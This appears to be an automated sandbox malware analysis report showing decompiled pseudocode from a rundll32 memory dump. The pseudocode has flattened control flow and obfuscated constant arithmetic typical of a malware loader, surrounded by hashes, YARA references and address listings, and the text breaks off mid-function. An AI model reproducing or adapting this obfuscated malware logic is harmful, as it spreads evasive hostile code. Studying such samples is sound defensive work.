                                                                                                                                    0x002e1252
                                                                                                                                    0x002e1256
                                                                                                                                    0x002e125d
                                                                                                                                    0x002e1261
                                                                                                                                    0x002e11d1
                                                                                                                                    0x002e11d1
                                                                                                                                    0x002e11d1
                                                                                                                                    0x00000000
                                                                                                                                    0x002e11d1
                                                                                                                                    0x002e120f
                                                                                                                                    0x002e1215
                                                                                                                                    0x002e138c
                                                                                                                                    0x002e1392
                                                                                                                                    0x002e1392
                                                                                                                                    0x002e121b
                                                                                                                                    0x002e1221
                                                                                                                                    0x002e1373
                                                                                                                                    0x002e1373
                                                                                                                                    0x002e1379
                                                                                                                                    0x002e11d7
                                                                                                                                    0x002e11d7
                                                                                                                                    0x00000000
                                                                                                                                    0x002e11d7
                                                                                                                                    0x002e1227
                                                                                                                                    0x002e122b
                                                                                                                                    0x002e1233
                                                                                                                                    0x00000000
                                                                                                                                    0x002e1233
                                                                                                                                    0x002e1221
                                                                                                                                    0x002e1215
                                                                                                                                    0x002e120d
                                                                                                                                    0x002e1205
                                                                                                                                    0x002e11f9
                                                                                                                                    0x002e139b
                                                                                                                                    0x002e13a1
                                                                                                                                    0x002e13a7
                                                                                                                                    0x002e13ac
                                                                                                                                    0x002e13ac
                                                                                                                                    0x002e12c4
                                                                                                                                    0x002e12ca
                                                                                                                                    0x002e12d5
                                                                                                                                    0x002e12dc
                                                                                                                                    0x002e131e
                                                                                                                                    0x002e1333
                                                                                                                                    0x002e133c
                                                                                                                                    0x002e134a
                                                                                                                                    0x002e134e
                                                                                                                                    0x002e1351
                                                                                                                                    0x002e1354
                                                                                                                                    0x002e1361
                                                                                                                                    0x002e1366
                                                                                                                                    0x002e1366
                                                                                                                                    0x002e1369
                                                                                                                                    0x002e136d
                                                                                                                                    0x00000000
                                                                                                                                    0x002e136d
                                                                                                                                    0x002e11d7

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                                    • API String ID: 0-2036408213
                                                                                                                                    • Opcode ID: 2db2dbd851ef3213d5997ee2a31252e14567f11899aea85506688684fae1f831
                                                                                                                                    • Instruction ID: 8de0efa73a81fe4f78df9eda65366e3ea37d1638e6aab710aec66ab1c293393a
                                                                                                                                    • Opcode Fuzzy Hash: 2db2dbd851ef3213d5997ee2a31252e14567f11899aea85506688684fae1f831
                                                                                                                                    • Instruction Fuzzy Hash: D2C152715183819FC318CF26C48941BBFE1FBC9358F508A1EF69A9A260D3B4D959CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DD389 Relevance: 7.7, Strings: 6, Instructions: 243COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002DD389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E002D20B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E002D9008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E002C4B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E002DDCF7(_v76, 0x2c173c, _t317);
									_t307 = E002DDE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E002CA8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E002C4241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}












































                                                                                                                                    0x002dd393
                                                                                                                                    0x002dd39c
                                                                                                                                    0x002dd39e
                                                                                                                                    0x002dd3a5
                                                                                                                                    0x002dd3a6
                                                                                                                                    0x002dd3ad
                                                                                                                                    0x002dd3b4
                                                                                                                                    0x002dd3b5
                                                                                                                                    0x002dd3bc
                                                                                                                                    0x002dd3be
                                                                                                                                    0x002dd3c3
                                                                                                                                    0x002dd3ca
                                                                                                                                    0x002dd3cd
                                                                                                                                    0x002dd3d5
                                                                                                                                    0x002dd3d7
                                                                                                                                    0x002dd3e1
                                                                                                                                    0x002dd3e9
                                                                                                                                    0x002dd3ee
                                                                                                                                    0x002dd3f6
                                                                                                                                    0x002dd3fb
                                                                                                                                    0x002dd403
                                                                                                                                    0x002dd40b
                                                                                                                                    0x002dd413
                                                                                                                                    0x002dd41b
                                                                                                                                    0x002dd41f
                                                                                                                                    0x002dd427
                                                                                                                                    0x002dd42f
                                                                                                                                    0x002dd434
                                                                                                                                    0x002dd439
                                                                                                                                    0x002dd441
                                                                                                                                    0x002dd449
                                                                                                                                    0x002dd44d
                                                                                                                                    0x002dd455
                                                                                                                                    0x002dd45d
                                                                                                                                    0x002dd465
                                                                                                                                    0x002dd46d
                                                                                                                                    0x002dd475
                                                                                                                                    0x002dd480
                                                                                                                                    0x002dd485
                                                                                                                                    0x002dd48b
                                                                                                                                    0x002dd493
                                                                                                                                    0x002dd49b
                                                                                                                                    0x002dd49f
                                                                                                                                    0x002dd4a7
                                                                                                                                    0x002dd4af
                                                                                                                                    0x002dd4b7
                                                                                                                                    0x002dd4bf
                                                                                                                                    0x002dd4c7
                                                                                                                                    0x002dd4cf
                                                                                                                                    0x002dd4d7
                                                                                                                                    0x002dd4df
                                                                                                                                    0x002dd4e7
                                                                                                                                    0x002dd4f4
                                                                                                                                    0x002dd4f5
                                                                                                                                    0x002dd4f9
                                                                                                                                    0x002dd4fe
                                                                                                                                    0x002dd506
                                                                                                                                    0x002dd50e
                                                                                                                                    0x002dd51c
                                                                                                                                    0x002dd525
                                                                                                                                    0x002dd529
                                                                                                                                    0x002dd531
                                                                                                                                    0x002dd539
                                                                                                                                    0x002dd53e
                                                                                                                                    0x002dd546
                                                                                                                                    0x002dd54e
                                                                                                                                    0x002dd558
                                                                                                                                    0x002dd565
                                                                                                                                    0x002dd570
                                                                                                                                    0x002dd575
                                                                                                                                    0x002dd57b
                                                                                                                                    0x002dd583
                                                                                                                                    0x002dd58b
                                                                                                                                    0x002dd58f
                                                                                                                                    0x002dd594
                                                                                                                                    0x002dd59c
                                                                                                                                    0x002dd5a4
                                                                                                                                    0x002dd5ac
                                                                                                                                    0x002dd5b4
                                                                                                                                    0x002dd5bc
                                                                                                                                    0x002dd5c4
                                                                                                                                    0x002dd5cc
                                                                                                                                    0x002dd5d4
                                                                                                                                    0x002dd5dc
                                                                                                                                    0x002dd5e4
                                                                                                                                    0x002dd5ec
                                                                                                                                    0x002dd5f0
                                                                                                                                    0x002dd5f8
                                                                                                                                    0x002dd600
                                                                                                                                    0x002dd608
                                                                                                                                    0x002dd610
                                                                                                                                    0x002dd618
                                                                                                                                    0x002dd620
                                                                                                                                    0x002dd628
                                                                                                                                    0x002dd630
                                                                                                                                    0x002dd638
                                                                                                                                    0x002dd63d
                                                                                                                                    0x002dd645
                                                                                                                                    0x002dd64a
                                                                                                                                    0x002dd652
                                                                                                                                    0x002dd65a
                                                                                                                                    0x002dd662
                                                                                                                                    0x002dd667
                                                                                                                                    0x002dd671
                                                                                                                                    0x002dd676
                                                                                                                                    0x002dd67c
                                                                                                                                    0x002dd684
                                                                                                                                    0x002dd690
                                                                                                                                    0x002dd698
                                                                                                                                    0x002dd69c
                                                                                                                                    0x002dd6a4
                                                                                                                                    0x002dd6ac
                                                                                                                                    0x002dd6b4
                                                                                                                                    0x002dd6bc
                                                                                                                                    0x002dd6c9
                                                                                                                                    0x002dd6cd
                                                                                                                                    0x002dd6d5
                                                                                                                                    0x002dd6e2
                                                                                                                                    0x002dd6e6
                                                                                                                                    0x002dd6ee
                                                                                                                                    0x002dd6f6
                                                                                                                                    0x002dd6fe
                                                                                                                                    0x002dd6fe
                                                                                                                                    0x002dd70c
                                                                                                                                    0x002dd7ec
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd712
                                                                                                                                    0x002dd718
                                                                                                                                    0x002dd839
                                                                                                                                    0x002dd71e
                                                                                                                                    0x002dd71e
                                                                                                                                    0x002dd720
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd726
                                                                                                                                    0x002dd726
                                                                                                                                    0x002dd72e
                                                                                                                                    0x002dd734
                                                                                                                                    0x002dd737
                                                                                                                                    0x002dd73c
                                                                                                                                    0x002dd745
                                                                                                                                    0x002dd74c
                                                                                                                                    0x002dd750
                                                                                                                                    0x002dd75c
                                                                                                                                    0x002dd7d4
                                                                                                                                    0x002dd7da
                                                                                                                                    0x002dd7df
                                                                                                                                    0x002dd7e2
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd7e2
                                                                                                                                    0x002dd720
                                                                                                                                    0x002dd718
                                                                                                                                    0x002dd840
                                                                                                                                    0x002dd84b
                                                                                                                                    0x002dd84b
                                                                                                                                    0x002dd807
                                                                                                                                    0x002dd80c
                                                                                                                                    0x002dd80f
                                                                                                                                    0x002dd811
                                                                                                                                    0x002dd81a
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd813
                                                                                                                                    0x002dd813
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd813
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd81f
                                                                                                                                    0x002dd81f
                                                                                                                                    0x002dd81f
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: T.~$hc$ru$($0$K<
                                                                                                                                    • API String ID: 0-2343433060
                                                                                                                                    • Opcode ID: f53d4d9fd4be603d1fc18c50edf409dc9df1bc507893f0d1be231544bcbe9fcb
                                                                                                                                    • Instruction ID: f339f5687814e8daf620e0cb80bd7baa8fca70f684ae56548fe4b5941dc2d4ed
                                                                                                                                    • Opcode Fuzzy Hash: f53d4d9fd4be603d1fc18c50edf409dc9df1bc507893f0d1be231544bcbe9fcb
                                                                                                                                    • Instruction Fuzzy Hash: 69C122725187809FD768CF61C986A5BFBE1FBD5708F104A1DF29A96260C7B28918CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C3E3F Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002C3E3F() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x2e3e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E002DDCF7(_v40, 0x2c1080, __eflags);
									_pop(_t236);
									__eflags = E002CAAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E002CA8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E002C1FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E002C1F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                                    0x002c3e3f
                                                                                                                                    0x002c3e42
                                                                                                                                    0x002c3e4c
                                                                                                                                    0x002c3e52
                                                                                                                                    0x002c3e5a
                                                                                                                                    0x002c3e5f
                                                                                                                                    0x002c3e67
                                                                                                                                    0x002c3e6f
                                                                                                                                    0x002c3e77
                                                                                                                                    0x002c3e7f
                                                                                                                                    0x002c3e87
                                                                                                                                    0x002c3e8f
                                                                                                                                    0x002c3e9c
                                                                                                                                    0x002c3ea0
                                                                                                                                    0x002c3ea5
                                                                                                                                    0x002c3ead
                                                                                                                                    0x002c3eb5
                                                                                                                                    0x002c3ebd
                                                                                                                                    0x002c3ec5
                                                                                                                                    0x002c3ecd
                                                                                                                                    0x002c3ed5
                                                                                                                                    0x002c3edd
                                                                                                                                    0x002c3ee5
                                                                                                                                    0x002c3eed
                                                                                                                                    0x002c3efb
                                                                                                                                    0x002c3f00
                                                                                                                                    0x002c3f06
                                                                                                                                    0x002c3f0e
                                                                                                                                    0x002c3f16
                                                                                                                                    0x002c3f1e
                                                                                                                                    0x002c3f23
                                                                                                                                    0x002c3f2b
                                                                                                                                    0x002c3f37
                                                                                                                                    0x002c3f3c
                                                                                                                                    0x002c3f42
                                                                                                                                    0x002c3f4a
                                                                                                                                    0x002c3f52
                                                                                                                                    0x002c3f57
                                                                                                                                    0x002c3f5f
                                                                                                                                    0x002c3f67
                                                                                                                                    0x002c3f6f
                                                                                                                                    0x002c3f7c
                                                                                                                                    0x002c3f7d
                                                                                                                                    0x002c3f81
                                                                                                                                    0x002c3f89
                                                                                                                                    0x002c3f91
                                                                                                                                    0x002c3f9e
                                                                                                                                    0x002c3fa2
                                                                                                                                    0x002c3faa
                                                                                                                                    0x002c3fb2
                                                                                                                                    0x002c3fc0
                                                                                                                                    0x002c3fc4
                                                                                                                                    0x002c3fcc
                                                                                                                                    0x002c3fd4
                                                                                                                                    0x002c3fd9
                                                                                                                                    0x002c3fe1
                                                                                                                                    0x002c3fe9
                                                                                                                                    0x002c3ff1
                                                                                                                                    0x002c3ff9
                                                                                                                                    0x002c4001
                                                                                                                                    0x002c4009
                                                                                                                                    0x002c4011
                                                                                                                                    0x002c4019
                                                                                                                                    0x002c4023
                                                                                                                                    0x002c4030
                                                                                                                                    0x002c4038
                                                                                                                                    0x002c4040
                                                                                                                                    0x002c4045
                                                                                                                                    0x002c404a
                                                                                                                                    0x002c4052
                                                                                                                                    0x002c405a
                                                                                                                                    0x002c4062
                                                                                                                                    0x002c4067
                                                                                                                                    0x002c406f
                                                                                                                                    0x002c4077
                                                                                                                                    0x002c407f
                                                                                                                                    0x002c408d
                                                                                                                                    0x002c4092
                                                                                                                                    0x002c4098
                                                                                                                                    0x002c40a0
                                                                                                                                    0x002c40a8
                                                                                                                                    0x002c40b0
                                                                                                                                    0x002c40b8
                                                                                                                                    0x002c40c5
                                                                                                                                    0x002c40c6
                                                                                                                                    0x002c40cc
                                                                                                                                    0x002c40d0
                                                                                                                                    0x002c40d8
                                                                                                                                    0x002c40dd
                                                                                                                                    0x002c40e5
                                                                                                                                    0x002c40ed
                                                                                                                                    0x002c40fb
                                                                                                                                    0x002c40fc
                                                                                                                                    0x002c4100
                                                                                                                                    0x002c4105
                                                                                                                                    0x002c410d
                                                                                                                                    0x002c410d
                                                                                                                                    0x002c410d
                                                                                                                                    0x002c4112
                                                                                                                                    0x002c4112
                                                                                                                                    0x002c411c
                                                                                                                                    0x002c41bb
                                                                                                                                    0x002c41c1
                                                                                                                                    0x002c41c9
                                                                                                                                    0x002c41c9
                                                                                                                                    0x002c41cc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c41c6
                                                                                                                                    0x002c41c6
                                                                                                                                    0x002c41c6
                                                                                                                                    0x002c41ce
                                                                                                                                    0x002c41d1
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4122
                                                                                                                                    0x002c4128
                                                                                                                                    0x002c4146
                                                                                                                                    0x002c414f
                                                                                                                                    0x002c4157
                                                                                                                                    0x002c415d
                                                                                                                                    0x002c41a0
                                                                                                                                    0x002c41ae
                                                                                                                                    0x002c41b1
                                                                                                                                    0x002c41b6
                                                                                                                                    0x002c4208
                                                                                                                                    0x002c420a
                                                                                                                                    0x002c420f
                                                                                                                                    0x00000000
                                                                                                                                    0x002c412a
                                                                                                                                    0x002c4130
                                                                                                                                    0x002c422e
                                                                                                                                    0x002c4136
                                                                                                                                    0x002c413c
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4142
                                                                                                                                    0x002c4142
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4142
                                                                                                                                    0x002c413c
                                                                                                                                    0x002c4130
                                                                                                                                    0x002c4128
                                                                                                                                    0x002c4235
                                                                                                                                    0x002c4240
                                                                                                                                    0x002c4240
                                                                                                                                    0x002c41f0
                                                                                                                                    0x002c41f7
                                                                                                                                    0x002c41fa
                                                                                                                                    0x002c41fc
                                                                                                                                    0x002c4201
                                                                                                                                    0x002c4201
                                                                                                                                    0x002c4204
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4210
                                                                                                                                    0x002c4210
                                                                                                                                    0x002c4210
                                                                                                                                    0x00000000
                                                                                                                                    0x002c421c

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                                    • API String ID: 0-3177096336
                                                                                                                                    • Opcode ID: 67ffb40e9ec39d670714aad34d47944606c3437ef3baf5b068da1c4df100af23
                                                                                                                                    • Instruction ID: 30cbbc8c2702f0cd0df573ee90affbe0f533f3f4c35f327c162b502b0280baed
                                                                                                                                    • Opcode Fuzzy Hash: 67ffb40e9ec39d670714aad34d47944606c3437ef3baf5b068da1c4df100af23
                                                                                                                                    • Instruction Fuzzy Hash: 22A140B26183419FC398CF25D88A91BBBF1FBD4758F108A1DF19986260D3B18959CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CB74D Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CB74D(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
